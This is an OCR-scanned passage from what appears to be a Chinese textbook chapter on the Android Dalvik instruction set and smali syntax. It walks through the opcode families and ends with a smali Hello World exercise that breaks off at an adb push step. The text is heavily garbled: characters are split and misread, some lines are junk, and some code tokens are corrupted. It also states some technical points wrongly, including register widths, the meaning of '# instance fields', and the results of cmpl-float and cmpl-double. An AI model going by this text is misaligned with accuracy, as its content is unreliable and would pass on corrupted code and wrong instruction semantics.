束 ， 根 据 方法 类 型 的 不 同 ， 在 方法 指令 开始 前 可 能 会 用 井 号 “#” 加 以 注释 。 
如 “# virtual methods” 表 示 这 是 一 个 虚 方 法 ，“# direct methods” 表 示 这 是 一 个 
直接 方法 。 

3. 字段 

字段 与 方法 很 相似 ， 只 是 字段 没有 方法 签名 域 中 的 参数 与 返回 值 ， 取 
而 代 之 的 是 字段 的 类 型 。 同 样 ，Dalvik 虚 拟 机 定位 字段 与 字 节 码 静态 分 析 时 
会 用 到 它 。 字 段 的 格式 如 下 : 

Lpackage/name/ObjectName;-» FieldName:Ljava/lang/String; 

字段 由 类 型 (Lpackage/name/ObjectName;) 、 字 段 名 (FieldName) 与 
字段 类 型 (Ljava/lang/String;) 组 成 。 其 中 字段 名 与 字段 类 型 中 间 用 冒号 “:” 
隅 开 。 

BakSmali 生 成 的 字段 代码 以 field 指令 开头 ， 根 据 字 段 类 型 的 不 同 ， 在 
字段 指令 的 开始 可 能 会 用 井 号 “#” 加 以 注释 ， 如 “# instance fields” 表 示 这 是 一 


rp 


PEPEE, “# instance fields” 表 示 这 是 一 个 静态 字段 。 


3.3 Dalvik 指 令 集 


{E Android 4.0 源 码 Dalvik/docs 目 录 下 提供 了 一 份 指 令 集 文档 dalvik- 
bytecode.html， 里 面 详 细 列 举 了 Dalvik 支 持 的 所 有 指令 ， 不 过 该 文档 在 
Android 4.1 源 码 中 已 经 去 除 。 


3.3.1 指令 特点 


Dalvik 指 令 在 调用 格式 上 模仿 了 C 语 言 的 调用 约定 。Dalvik 指 令 的 语法 
与 助词 符 有 如 下 特点 : 

e 参数 采用 从 目标 (destination) 到 源 (source) 的 方式 。 

e 根据 字 节 码 的 大 小 与 类 型 不 同 ， 一 些 字 节 码 添加 了 名 称 后 缀 以 消除 


m 32 位 常规 类 型 的 字 节 码 未 添加 任何 后 缀 。 

m 64 位 常规 类 型 的 字 节 码 添加 -wide 后 缀 。 

四 ”特殊 类 型 的 字 节 码 根据 具体 类 型 添加 后 缀 。 它 们 可 以 是 -boolean、- 
byte. -char. -short, -ints -long. -float, -double. -object. -string. -class. - 
void 之 一 。 

e 根据 字 节 码 的 布局 与 选项 不 同 ， 一 些 字 节 码 添加 了 字 节 码 后 缀 以 消 
除 歧义 。 这 些 后 缀 通过 在 字 节 码 主 名 称 后 添加 冬 杠 “/”* 来 分 隔 开 。 

e 在 指令 集 的 描述 中 ， 宽 度 值 中 每 个 字母 表示 宽度 为 4 位 。 

例如 这 条 指令 : “move-wide/from16 vAA, vBBBB" 

move 为 基础 字 节 码 (base opcode) 。 标 识 这 是 基本 操作 。 

wide 为 名 称 后 缀 (name suffix) 。 标 识 指 令 操作 的 数据 宽度 (64 位 ) o 

from16 为 字 节 码 后 缀 (opcode suffix) 。 标 识 源 为 一 个 16 位 的 寄存 器 引 
用 变量 。 


vAA 为 目的 育 存 器 。 它 始终 在 源 的 前 面 ， 取 值 范 围 为 v0~v255。 


vBBBB 为 源 寄存 器 。 取 值 范 围 为 v0 人 v65535。 

Dalvik 指 令 集 中 大 多 数 指令 用 到 了 寄存 器 作为 目的 操作 数 或 源 操作 数 ， 
其 中 A/B/C/D/E/F/G/H 代 表 一 个 4 位 的 数值 ， 可 用 来 表示 0 人 15 的 数值 或 v0 人 ~ 
v15 的 寄存 器 ， 而 AA/BB/CC/DD/EE/FF/GG/HH 代 表 一 个 8 位 的 数值 ， 可 用 来 
表示 0 ~ 255 的 数值 或 v0 ~ v255 的 寄存 器 ， 
AAAA/BBBB/CCCC/DDDD/EEEE/FFFF/GGGG/HHHH 代表 一 个 8 位 的 数 
值 ， 可 用 来 表示 0 人 65535 的 数值 或 v0~v65535 的 寡 存 器 。 


注意 
Android 官 方 指令 文档 描述 寄存 器 时 ， 对 不 同 取 值 范围 的 寄存 器 以 括号 说 明 其 大 小 ， 如 A: 
destination register (4 bits), A: destination register (16 bits)。 本 章 后 续 小 节 在 描述 指令 时 ， 会 采用 4 位 、 
8 位 或 16 位 等 方式 加 以 说 明 。 请 读者 注意 : Dalvik 虚 拟 机 中 的 每 个 寄存 器 都 是 32 位 的 。 描述 指令 时 所 
说 的 位 数 表示 的 是 寄存 器 数值 的 取 值 范围 。 


3.3.2 ” 空 操作 指令 


空 操作 指令 的 助 记 符 为 nop。 它 的 值 为 00， 通 常 hop 指 令 被 用 来 作对 齐 
代码 之 用 ， 无 实际 操作 。 


3.3.3 ”数据 操作 指令 


数据 操作 指令 为 move。move 指 令 的 原型 为 move destination, source 或 
move destination，move 指 令 根 据 字 节 码 的 大 小 与 类 型 不 同 ， 后 面 会 跟 上 不 
同 的 后 级。 

“move vA, VB” 将 vB 寄存 器 的 值 赋 给 vA 寄 存 器 ， 源 寄存 器 与 目的 寄存 器 
都 为 4 位 。 

*move/from16 vAA, vBBBB” 将 vBBBB 寄 存 器 的 值 赋 给 vAA 寄 存 器 ， 源 
寄存 器 为 16 位 ， 目 的 寄存 器 为 8 位 。 


“move/16 vVAAAA, vBBBB” 将 VBBBB 寄 存 器 的 值 赋 给 vAAAA 寄 存 器 ， 
源 寄存 器 与 目的 寄存 器 都 为 16 位 。 

*move-wide vA, vB” 为 4 位 的 寄存 器 对 赋值 。 源 寄存 器 与 目的 寄存 器 都 
为 4 位 。 

*move-wide/from16 vAA, vBBBB" 5E *move-wide/16 vAAAA, vBBBB"SZ 
现 与 nove-wide 相 同 。 

*move-object vA, vB” 为 对 象 赋值 。 源 寄存 器 与 目的 寄存 器 都 为 4 位 。 

*move-object/from16 vAA, vBBBB” 为 对 象 赋值 。 源 寄存 器 为 8 位 ， 目 的 
寄存 器 为 16 位 。 

*move-object/16 vAAAA, vBBBB” 为 对 象 赋值 。 源 寄存 器 与 目的 寄存 器 
都 为 16 位 。 

*move-result vVAA” 将 上 一 个 invoke 类 型 指令 操作 的 单字 非 对 象 结果 赋 给 
VAAS TE. 

*move-result-wide VAA” 将 上 一 个 invoke 类 型 指令 操作 的 双 字 非 对 象 结 
赋 给 vAA 寄 存 器 。 

*move-result-object vVAA” 将 上 一 个 invoke 类 型 指令 操作 的 对 象 结 果 赋 给 
vVAA 寄 存 器 。 

*move-exception VAA” 保 存 一 个 运行 时 发 生 的 异常 到 vAA 宵 存 器 。 这 条 
指令 必须 是 异常 发 生 时 的 异常 处 理 器 的 一 条 指令 。 否 则 的 话 ， 指 令 无 效 。 


3.3.4 ”返回 指令 


返回 指令 指 的 是 函数 结尾 时 运行 的 最 后 一 条 指令 。 它 的 基础 字 节 码 为 
return， 共 有 以 下 四 条 返回 指令 。 

*return-void" zz EK 2 A, — T void 73 A3 [B], 

“return VAA” 表 示 函 数 返回 一 个 32 位 非 对 象 类 型 的 值 ， 返 回 值 寄存 器 为 
8 位 的 寄存 器 YAA。 

*return-wide vVAA” 表 示 图 数 返 回 一 个 64 位 非 对 象 类 型 的 值 。 返 回 值 为 8 
位 的 寄存 器 对 vAA。 


*return-object vVAA” 表 示 国 数 返 回 一 个 对 象 类 型 的 值 。 返 回 值 为 8 位 的 寄 
存 器 vAA。 


3.3.5 ”数据 定义 指令 


数据 定义 指令 用 来 定义 程序 中 用 到 的 常量 、 字 符 串 、 类 等 数据 。 它 的 
基础 字 节 码 为 const。 

“const/4 vA, #+B” 将 数值 符号 扩展 为 32 位 后 赋 给 寄存 器 VA。 

“const/16 VAA, #+BBBB” 将 数值 符号 扩展 为 32 位 后 赋 给 寄存 器 vAA。 

"const VAA, #+BBBBBBBB” 将 数值 赋 给 寄存 器 VAA。 

“const/high16 vAA, #+BBBB0000” 将 数值 右边 零 扩 展 为 32 位 后 赋 给 寄存 
器 VAA。 

“const-wide/16 vAA, #+BBBB” 将 数值 符号 扩展 为 64 位 后 赋 给 寄存 器 对 
VAA。 

“const-wide/32 vAA, #+BBBBBBBB” 将 数值 符号 扩展 为 64 位 后 赋 给 寄存 
器 对 vAA。 

*const-wide vAA, #+BBBBBBBBBBBBBBBB” 将 数值 赋 给 寄存 器 对 
VAA。 

*const-wide/high16 vAA, #+BBBB000000000000” 将 数值 右边 零 扩 展 为 64 
位 后 赋 给 寄存 器 对 vAA。 

“const-string VAA, string@BBBB” 通 过 字符 串 索 引 构 造 一 个 字符 串 并 赋 
给 寄存 器 vVAA。 

“const-string/jumbo VAA, string@BBBBBBBB” 通 过 字符 串 索 引 ( 较 大 ) 
构造 一 个 字符 串 并 赋 给 寄存 器 vAA。 

“const-class VAA, type@DBBBB” 通 过 类 型 索引 获取 一 个 类 引用 并 赋 给 寄 
存 器 VAA。 

“const-class/jumbo vAAAA, type@BBBBBBBB” 通 过 给 定 的 类 型 索引 获 
取 一 个 类 引用 并 赋 给 寄存 器 YAAAA。 这 条 指令 占用 两 个 字 节 ， 值 为 0x00ff 

(Android 4.0 中 新 增 的 指令 ) 。 


3.3.6 MHES 


锁 指 令 多 用 在 多 线程 程序 中 对 同一 对 象 的 操作 。Dalvik 指 令 集中 有 两 条 
锁 指令 。 

“monitor-enter VAA” 为 指定 的 对 象 获取 锁 。 

“monitor-exit VAA” 释 放 指 定 的 对 象 的 锁 。 


3.3.7 ”实例 操作 指令 


与 实例 相关 的 操作 包括 实例 的 类 型 转换 、 检 查 及 新 建 等 。 
“check-cast VAA, type@BBBB” 将 vAA 寄 存 器 中 的 对 象 引 用 转换 成 指定 
的 类 型 ， 如 果 失 败 会 抛 出 ClassCastException 异 常 。 如 果 类 型 B 指 定 的 是 基本 
类 型 ， 对 于 非 基 本 类 型 的 A 来 说 ， 运 行 时 始终 会 失败 。 
“instance-of vA, vB, type@CCCC” 判 断 vB 寄 存 器 中 的 对 象 引 用 是 否 可 以 
转换 成 指定 的 类 型 ， 如 果 可 以 vA 寄 存 器 赋值 为 1， 否 则 vA 寄 存 器 赋值 为 0。 
*new-instance VAA, type@BBBB” 构 造 一 个 指定 类 型 对 象 的 新 实例 ， 并 
将 对 象 引 用 赋值 给 vAA 寄 存 器 ， 类 型 符 type 指 定 的 类 型 不 能 是 数组 类 。 
“check-casVjumbo vAAAA, type@BBBBBBBB” 指 令 功 能 与 “check-cast 
VAA, type@BBBB” 相 同 ， 只 是 寄存 器 值 与 指令 的 索引 取 值 范围 更 大 
(Android 4.0 中 新 增 的 指令 ) c 
*instance-of/jumbo vAAAA, vBBBB, typeaCCCCCCCC" 18 $ I) 8E E 
“instance-of vA, vB, type@DCCCC” 相 同 ， 只 是 寄存 器 值 与 指令 的 索引 取 值 范 
围 更 大 (Android 4.0 中 新 增 的 指令 ) 。 
*new-instance//umbo vAAAA, type@BBBBBBBB” 指 令 功 能 与 “new- 
instance vAA, type@BBBB” 相 同 ， 只 是 寄存 器 值 与 指令 的 索引 取 值 范围 更 大 
(Android 4.0 中 新 增 的 指令 ) 。 


3.3.8 ”数组 操作 指令 


数组 操作 包括 获取 数组 长 度 、 新 建 数组 、 数 组 赋值 、 数 组 元 素 取 值 与 
赋值 等 操作 。 

“array-length vA, VB” 获取 给 定 vB 寄存 器 中 数组 的 长 度 并 将 值 赋 给 vA 寄 
存 器 ， 数 组 长 度 指 的 是 数组 的 条 目 个 数 。 

“new-array vA, vB, typegCCCC" f] 造 指定 类 型 (typegCCCC) 与 大 小 

(vB) 的 数组 ， 并 将 值 赋 给 vA 寄 存 器 。 
*filled-new-array (vC, vD, vE, vF, vG}, type BBBB" f4 3& $8 3E X 2d 
(typegBBBB) 与 大 小 (vA) 的 数组 并 填充 数组 内 容 。vA 寄 存 器 是 隐 含 使 
用 的 ， 除 了 指定 数组 的 大 小 外 还 指定 了 参数 的 个 数 ，vC~vG 是 使 用 到 的 参 
数 育 存 器 序列 。 

“filled-new-array/range {VCCCC .. vNNNN]), type@BBBB” 指 令 功 能 与 
*filled-new-array (vC, vD, vE, vF, vG}, type@DBBBB” 相 同 ， 只 是 参数 寄存 器 使 
用 range 字 节 码 后 缀 指定 了 取 值 范围 ，vC 是 第 一 个 参数 寄存 器 ，N=A+cC - 
1o 

*fill-array-data VAA, +TBBBBBBBB” 用 指定 的 数据 来 填充 数组 ，vAA 寄 
存 器 为 数组 引用 ， 引 用 必须 为 基础 类 型 的 数组 ， 在 指令 后 面 会 紧 跟 一 个 数 
据 表 。 

*new-array/jumbo vAAAA, vBBBB, typeCCCCCCCC" 18 $ Ij 8E E 
*new-array vA, vB, type@CCCC” 相 同 ， 只 是 寄存 器 值 与 指令 的 索引 取 值 苑 
围 更 大 (Android 4.0 中 新 增 的 指令 ) 。 

“filled-new-array/jumbo{vCCCC .VNNNN},type@BBBBBBBB” 指 令 功 能 
与 “filled-new-array/range {VCCCC .. vNNNN), type@BBBB” 相 同 ， 只 是 索引 
取 值 范围 更 大 (Android 4.0 中 新 增 的 指令 ) 。 

“arrayop VAA, vBB, vCC” 对 vBB 寄 存 器 指定 的 数组 元 素 进 入 取 值 与 赋 
值 。vCC 宵 存 器 指定 数组 元 素 索 引 ，vAA 寄 存 器 用 来 存放 读 取 的 或 需要 设置 
的 数组 元 素 的 值 。 读 取 元 素 使 用 aget 类 指令 ， 元 素 赋值 使 用 aput 类 指令 ， 根 
据 数 组 中 存储 的 类 型 指令 后 面 会 紧 跟 不 同 的 指令 后 经， 指令 列表 有 aget、 


aget-wide、 aget-object、 aget-boolean、 aget-byte、 aget-char 、 aget-short、 


aput, aput-wide、 aput-object、 aput-boolean、 aput-byte、 aput-char. aput- 


shorto 


339 “异常 指令 


Dalvik 指 令 集中 有 一 条 指令 用 来 抛 出 异常 。 
“throw VAA” 抛 出 vAA 寄 存 器 中 指定 类 型 的 异常 。 


3.310 WHS 


跳 转 指令 用 于 从 当前 地 址 跳 转 到 指定 的 偏 移 处 。Dalvik 指 令 集 中 有 三 种 
跳 转 指令 : 无 条 件 跳 转 (goto) 、 分 支 跳 转 (switch) 与 条 件 跳 转 (if) 。 

“goto +AA” 无 条 件 跳 转 到 指定 偏 移 处 ， 偏 移 量 AA 不 能 为 0。 

“goto/16 +AAAA” 无 条 件 跳 转 到 指定 偏 移 处 ， 偏 移 量 AAAA 不 能 为 0。 

“goto/32 +AAAAAAAA” 无 条 件 跳 转 到 指定 偏 移 处 。 

“packed-switch vAA, +BBBBBBBB” 分 支 跳 转 指令 。vAA 宵 存 器 为 switch 
分 支 中 需要 判断 的 值 ，BBBBBBBB 指 向 一 个 packed-switch-payload 格 式 的 偏 
移 表 ， 表 中 的 值 是 有 规律 递增 的 。 

*sparse-switch vAA, +BBBBBBBB” 分 支 跳 转 指令 。vAA 寡 存 器 为 Switch 
分 支 中 需要 判断 的 值 ，BBBBBBBB 指 向 一 个 sparse-switch-payload 格 式 的 偏 
移 表 ， 表 中 的 值 是 无 规律 的 偏 移 量 。 关 于 分 支 跳 转 指令 类 型 的 代码 会 在 第 5 
章 中 详细 介绍 。 

“if-test vA, vB, +CCCC” 条 件 跳 转 指令 。 比 较 vA 寄 存 器 与 VB 寄存 器 的 
值 ， 如 果 比 较 结 果 满 足 就 跳 转 到 CCCC 指 定 的 偏 移 处 。 偏 移 量 CCCC 不 能 为 
0。if-test 类 型 的 指令 有 以 下 几 条 : 

e “if-eq” 如 果 vA 等 于 vB 则 跳 转 。Java 语 法 表示 为 “if (vA == vB)" 

e “if-ne” 如 果 vA 不 等 于 vB 则 跳 转 。Java 语 法 表示 为 “if (vA != vB)" 

e “if-lt* 如 果 vA 小 于 vB 则 跳 转 。Java 语 法 表示 为 “if (vA < vB)" 

e “if-ge” 如 果 vA 大 于 等 于 vB 则 跳 转 。Java 语 法 表示 为 “if (vA >= vB)" 


e “if-gtb" 如 果 vA 大 于 vB 则 跳 转 。Java 语 法 表示 为 "if (VA > vB)" 

e “if-le” 如 果 vA 小 于 等 于 vB 则 跳 转 。Java 语 法 表示 为 “if (VA <= vB)" 

“if-testz VAA, +BBBB” 条 件 跳 转 指令 。 拿 vVAA 宵 存 器 与 0 比较 ， 如 果 比 
较 结 果 满 足 或 值 为 0 时 就 跳 转 到 BBBB 指 定 的 偏 移 处 。 偏 移 量 BBBB 不 能 大 
0。if-testz 类 型 的 指令 有 以 下 几 条 : 

e “if-eq” 如 果 vA 人 A 为 0 则 跳 转 。Java 语 法 表示 为 “if (IVAAJ)” 

e “if-ne” 如 果 vAA 不 为 0 则 跳 转 。Java 语 法 表示 为 “if (VA A)" 

e “if-lt* 如 果 vAA 小 于 0 则 跳 转 。Java 语 法 表示 为 “if (VAA < 0)" 

e “if-ge” 如 果 vAA 大 于 等 于 0 则 跳 转 。Java 语 法 表示 为 “if (VAA >= 0)" 

e “if-gt” 如 果 vAA 大 于 0 则 跳 转 。Java 语 法 表示 为 “if (VAA > 0)" 

e “if-le” 如 果 vAA 小 于 等 于 0 则 跳 转 。Java 语 法 表示 为 “if (VAA <= 0)" 


3.3.11 ”比较 指令 


比较 指令 用 于 对 两 个 寄存 器 的 值 〈 浮 点 型 或 长 整 型 ) 进行 比较 。 它 的 
格式 为 “cmpkind vAA, vBB, vCC”， 其 中 vBB 寡 存 器 与 vCC 寡 存 器 是 需要 比 
较 的 两 个 寄存 器 或 两 个 寄存 器 对 ， 比 较 的 结果 放 到 vAA 寄 存 器 。Dalvik 指 令 
集中 共有 5 条 比较 指令 。 

“cmpl-float”" 比 较 两 个 单 精 度 浮 点 数 。 如 果 vBB 寄 存 器 大 于 vCC 寄 存 器 ， 
则 结果 为 -1， 相 等 则 结果 为 0， 小 于 的 话 结果 为 1。 

“cmpg-float” 比 较 两 个 单 精 度 浮 点 数 。 如 果 vBB 寄 存 器 大 于 vCC 寄 存 
器 ， 则 结果 为 1， 相 等 则 结果 为 0， 小 于 的 话 结果 为 -1。 

“cmpl-double” 比 较 两 个 双 精 度 浮 点 数 。 如 果 vBB 寄 存 器 对 大 于 vCC 寡 存 
器 对 ， 则 结果 为 -1， 相 等 则 结果 为 0， 小 于 的 话 结果 为 1。 

“cmpg-double” 比 较 两 个 双 精 度 浮 点 数 。 如 果 vBB 寡 存 器 对 大 于 vCC 寡 存 
器 对 ， 则 结果 为 1， 相 等 则 结果 为 0， 小 于 的 话 结果 为 -1。 

“cmp-long” 比 较 两 个 长 整 型 数 。 如 果 vBB 寄 存 器 大 于 vCC 寄 存 器 ， 则 结 
果 为 1， 相 等 则 结果 为 0， 小 于 的 话 结果 为 -1。 


3.3.12 ”字段 操作 指令 


字段 操作 指令 用 来 对 对 象 实例 的 字段 进入 读 写 操作 。 字 段 的 类 型 可 以 
是 Java 中 有 效 的 数据 类 型 。 对 普通 字段 与 静态 字段 操作 有 两 种 指令 集 ， 分 别 
是 “iinstanceop vA, vB, field@CCCC” 与 “sstaticop vAA, field@BBBB”。 

普通 字段 指令 的 指令 前 绎 为 1， 如 对 普通 字段 读 操作 使 用 iget 指 令 ， 写 操 
作 使 用 iput 指 令 ; 静态 字段 的 指令 前 缀 为 5， 如 对 静态 字段 读 操作 使 用 sget 指 
令 ， 写 操作 使 用 sput 指 令 。 

根据 访问 的 字段 类 型 不 同 ， 字 段 操作 指令 后 面 会 紧 跟 字段 类 型 的 后 
缀 ， 如 iget-byte 指 令 表 示 读 取 实 例 字段 的 值 类 型 为 字 节 类 型 ，iput-short 指 令 
表示 设置 实例 字段 的 值 类 型 为 短 整形 。 两 类 指令 操作 结果 都 是 一 样 ， 只 是 
指令 前 经 与 操作 的 字段 类 型 不 同 。 

普遍 字段 操作 指令 有 : iget、iget-wide、iget-object、iget-boolean、iget- 
byte、iget-char、iget-short、iput、iput-wide、iput-object、iput-boolean、iput- 
byte, iput-char, iput-shorto 

静态 字段 操作 指令 有 : sget. sget-wide, sget-object、 sget-boolean, 
sget-byte ~ sget-char ~ sget-short 、 sput, sput-wide 、 sput-object 、 sput- 
boolean、 sput-byte、sput-char、sput-shorto 

在 Android 4.0 系 统 中 ，Dalvik 指 令 集 中 增加 了 “iinstanceop/jumbo 
vAAAA, vBBBB, field@CCCCCCCC” 与 “sstaticop/jumbo vAAAA, 
field@BBBBBBBB” 两 类 指令 ， 它 们 与 上 面 介 绍 的 两 类 指令 作用 相同 ， 只 是 
在 指令 中 增加 了 jumbo 字 节 码 后 缀 ， 且 寄存 器 值 与 指令 的 索引 取 值 范围 更 
大 。 


3.3.13 “方法 调用 指令 


方法 调用 指令 负责 调用 类 实例 的 方法 。 它 的 基础 指令 为 invoke， 方 法 调 
用 指令 有 “invoke-kind (vC, vD, vE, vF, vG}, meth@BBBB” 与 “invoke- 
kind/range {vCCCC .. vNNNN), meth@BBBB” 两 类 ， 两 类 指令 在 作用 上 并 无 


不 同 ， 只 是 后 者 在 设置 参数 寄存 器 时 使 用 了 range 来 指定 寄存 器 的 范围 。 根 
据 方法 类 型 的 不 同 ， 共 有 如 下 五 条 方法 调用 指令 。 

“invoke-virtual” 或 “invoke-virtual/range” 调 用 实例 的 虚 方 法 。 

“invoke-super” 或 “invoke-superrange” 调 用 实例 的 父 类 方法 。 

“invoke-direct” 或 “invoke-direct/range” 调 用 实例 的 直接 方法 。 

“invoke-static” 或 “invoke-static/range” 调 用 实例 的 静态 方法 。 

“invoke-interface” 或 “invoke-interface/range” 调 用 实例 的 接口 方法 。 

在 Android 4.0 系 统 中 ，Dalvik 指 令 集 中 增加 了 “invoke-kind/jumbo 
(vCCCC .. VNNNN}, methOBBBBBBBB” 这 类 指令 ， 它 与 上 面 介 绍 的 两 类 指 
令 作 用 相同 ， 只 是 在 指令 中 增加 了 jumbo 字 节 码 后 缀 ， 且 寄存 器 值 与 指令 此 
索引 取 值 范围 更 大 。 

方法 调用 指令 的 返回 值 必须 使 用 move-result* 指 令 来 获取 。 如 下 面 两 条 


指令 : 


invoke-static {}, Landroid/os/Parcel;-»obtain()Landroid/os/Parcel; 


move-result-object v0 


33414 ”数据 转换 指令 


数据 转换 指令 用 于 将 一 种 类 型 的 数值 转换 成 男 一 种 类 型 。 它 的 格式 为 
*unop vA, vB”，vVvB 寄 存 器 或 vB 寄存 器 对 存放 需要 转换 的 数据 ， 转 换 后 的 结 
果 保 存在 vA 寄 存 器 或 vA 寄 存 器 对 中 。 

“neg-int” 对 整 型 数 求 补 。 

“not-int” 对 整 型 数 求 反 。 

“neg-long” 对 长 整 型 数 求 补 。 

“not-long” 对 长 整 型 数 求 反 。 

“neg-float” 对 单 精度 浮 点 型 数 求 补 。 

“neg-double” 对 双 精 度 浮 点 型 数 求 补 。 

“int-to-long” 将 整 型 数 转 换 为 长 整 型 。 

“int-to-float” 将 整 型 数 转 换 为 单 精度 浮 点 型 。 


“int-to-double” 将 整 型 数 转换 为 双 精 度 浮 点 型 。 
“long-to-int” 将 长 整 型 数 转换 为 整 型 。 

“long-to-float” 将 长 整 型 数 转换 为 单 精度 浮 点 型 。 
“long-to-double” 将 长 整 型 数 转换 为 双 精 度 浮 点 型 。 
“float-to-int” 将 单 精度 浮 点 型 数 转换 为 整 型 。 
“float-to-long” 将 单 精 度 浮 点 型 数 转换 为 长 整 型 。 
“float-to-double” 将 单 精度 浮 点 型 数 转换 为 双 精 度 浮 点 型 。 
“double-to-int” 将 双 精 度 浮 点 型 数 转换 为 整 型 。 
“double-to-long” 将 双 精 度 浮 点 型 数 转换 为 长 整 型 。 
“double-to-float” 将 双 精 度 浮 点 型 数 转换 为 单 精度 浮 点 型 。 
“int-to-byte” 将 整 型 转换 为 字 节 型 
“int-to-char” 将 整形 转换 为 字符 串 。 
“int-to-short” 将 整 型 转换 为 短 整 型 


3.3.15 ”数据 运算 指令 


数据 运算 指令 包括 算术 运算 指令 与 逻辑 运算 指令 。 算 术 运算 指令 主要 
进行 数值 间 如 加 、 减 、 乘 、 除 、 模 、 移 位 等 运算 ， 逻 辑 运算 指令 主要 进行 
数值 间 与 、 或 、 非 、 抑 或 等 运算 。 数 据 运算 指令 有 如 下 四 类 (数据 运算 时 

可 能 是 在 寄存 器 或 寄存 器 对 间 进 行 ， 下 面 的 指令 作用 讲解 时 使 用 寄存 器 来 

描述 ) : 

*binop VAA, vBB, vCC” 将 vBB 寄 存 器 与 vCC 寄 存 器 进行 运算 ， 结 果 保 存 
到 vAA 寄 存 器 。 

*binop/2addr vA, vB” 将 vA 寡 存 器 与 vB 寄存 器 进行 运算 ， 结 果 保 存 到 vA 
寄存 器 。 

*binop/lit16 vA, vB, #+CCCC” 将 vB 寄存 器 与 常量 CCCC 进 行 运算 ， 结 果 
保存 到 vA 寄 存 器 。 

*binop/lit8 vAA, vBB, #+CC” 将 VBB 寄 存 器 与 常量 CC 进行 运算 ， 结 果 保 
存 到 vAA 寄 存 器 。 


后 面 3 类 指令 比 第 1 类 指令 分 别 多 出 了 2addr、1lit16、1lit8 等 指令 后 缀 。 四 
类 指令 中 基础 字 节 码 相 同 的 指令 执行 的 运算 操作 是 类 似 的 ， 第 1 类 指令 中 ， 
根据 数据 的 类 型 不 同 会 在 基础 字 节 码 后 面 加 上 数据 类 型 后 级 ， 如 -int 或 -long 
分 别 表示 操作 的 数据 类 型 为 整 型 与 长 整 型 。 第 1 类 指令 可 归 类 如 下 : 
“add-type”VBB 寄 存 器 与 vCC 寄 存 器 值 进行 加 法 运算 (vBB + vCC) o 
“sub-type”"VBB 寄 存 器 与 vCC 寄 存 器 值 进行 减 法 运算 (vBB - vCC) o 
“mul-type”vVBB 寄 存 器 与 vCC 寄 存 器 值 进行 乘法 运算 (vBB xvCC) o 
“div-type”vVBB 寄 存 器 与 vCC 寄 存 器 值 进行 除法 运算 (vBB/vCC) o 
“rem-type”"VBB 寡 存 器 与 vCC 寄 存 器 值 进 行 模 运 算 (vBB96vCC) o 
“and-type”VBB 寄 存 器 与 vCC 寄 存 器 值 进 行 与 运算 (vBB AND vCC) o 
“or-type”VBB 寄 存 器 与 vCC 寄 存 器 值 进 行 或 运算 (vBB OR vCC) o 
*xor-type"vBB 寄存 器 与 vCC 寡 存 器 值 进行 异 或 运算 (vBB XOR 
vCC) e 
“shl-type”vBB 寄 存 器 值 《有 符号 数 ) 左 移 vCC 位 (vBB << vCC) o 
“shr-type"VBB 寄 存 器 值 《有 符号 数 ) 右 移 vCC 位 (vBB >> vCC) o 
“ushr-type”VBB 寄 存 器 值 (无 符号 数 ) 右 移 vCC 位 (vBB >> VCC) o 
其 中 基础 字 节 码 后 面 的 -type 可 以 是 -int、-long、-float、-double。 后 面 3 
类 指令 与 之 类 似 ， 此 处 不 再 列 出 。 
至 此 ，Dalvik 虚 拟 机 支持 的 所 有 指令 就 介绍 完了 。 在 Android 4.0 系 统 以 
前 ， 每 个 指令 的 字 节 码 只 占用 一 个 字 节 ， 范 围 是 0x0~-0x0ff。 在 Android 4.0 
系统 中 ， 又 扩充 了 一 部 分 指令 ， 这 些 指令 被 称 为 扩展 指令 ， 主 要 是 在 指令 
助 记 符 后 添加 了 jumbo 后 缀 ， 增 加 了 寄存 器 与 常量 的 取 值 学 围 。 


3.4 Dalvik 指 令 集 练 习 一 一 写 一 个 Dalvik 版 的 Hello 
World 


本 节 主 要 对 前 面 所 学 的 知识 进行 简单 的 回顾 ， 加 深 对 Dalvik 指 令 的 理 
解 ， 读 者 在 练习 过 程 中 需要 多 看 多 写 ， 认 真 打 好 Dalvik 汇 编 基础 ， 为 后 面 的 
分 析 做 准备 。 


3.4.1 ”编写 smali 文 件 


本 节 采 用 smali 语 法 来 编写 一 段 Dalvik 指 令 集 代码 来 巩固 上 面 所 学 到 的 
知识 。 新 建 一 个 文本 文件 改名 为 HelloWorld.smali， 然 后 写 出 HelloWorld 类 的 
程序 框架 如 下 : 

.Class public LHelloWorld; # 定 义 类 名 

.super Ljava/lang/Object;  # 定 义 父 类 


.method public static main([Ljava/lang/String;)V # 声 明 静 态 main() 方 法 


.registers 4 # 程 序 中 使 用 v0、v1、v2 寄 存 器 与 一 个 参数 寄存 器 
.parameter # 一 个 参数 

.prologue # 代 码 起 始 指令 

return-void # 返 回 空 


.end method 


这 是 一 段 HelloWorld 的 架构 代码 ， 定 义 了 一 个 可 编译 运行 的 DEX 文 件 的 
最 小 组 成 部 分 。 下 面 在 .prologue 指 令 下 面 编写 具体 代码 : 


nop 

# 数 据 定 义 指 令 

const/16 v0, 0x8 

const/4 v1, 0x5 

const/4 v2, 0x3 

# 数 据 操作 指令 

move v1, v2 

# 数 组 操作 指令 

new-array v0, v0, [I 

array-length v1, v0 

# 实 例 操 作 指 令 

new-instance v1, Ljava/lang/StringBuilder; 

# 方 法 调用 指令 

invoke-direct (v1), Ljava/lang/StringBuilder;-»«init»()V 

# 跳 转 指令 

if-nez v0, :cond 0 

goto :goto O0 

:cond 0 

# 数 据 转 换 指 令 

int-to-float v2, v2 

# 数 据 运算 指令 

add-float v2, v2, v2 

# 比 较 指令 

cmpl-float v0, v2, v2 

# 字 段 操 作 指令 

sget-object v0, Ljava/lang/System;-»out:Ljava/io/PrintStream; 

const-string vil, "Hello World" # 构 造 字 符 串 

# 方 法 调用 指令 

invoke-virtual (v0, v1}, Ljava/io/PrintStream;-»println(Ljava/lang/String;)V 
# 返 回 指令 

:goto O0 

return-void 


代码 中 使 用 中 了 本 节 中 讲 到 的 大 多 数 类 型 的 指令 ， 读 者 可 以 参照 这 上 段 
代码 自己 进行 添加 或 修改 。 


3.4.2 ”编译 smali 文 件 


编译 smali 文 件 使 用 smali.jar。 打 开 命 令 提示 符 窗口 ， 执 行 以 下 命令 进行 


java -jar smali.jar -o classes.dex HelloWorld.smali 


如 果 没 有 错误 ， 会 在 当前 目录 下 生成 classes.dex 文 件 。 如 果 编 译 提示 找 
不 到 文件 ， 可 以 将 smali.jar 与 Helloworld.smali 放 到 同一 目录 后 再 进行 编译 。 


3.4.3 ”测试 运行 


启动 Android 运 行 环 境 ， 可 以 是 Android 模 拟 器 或 真实 Android 设 备 ， 在 
命令 提示 符 窗口 中 执行 以 下 命令 。 

adb push HelloWorld.zip /data/local/ 

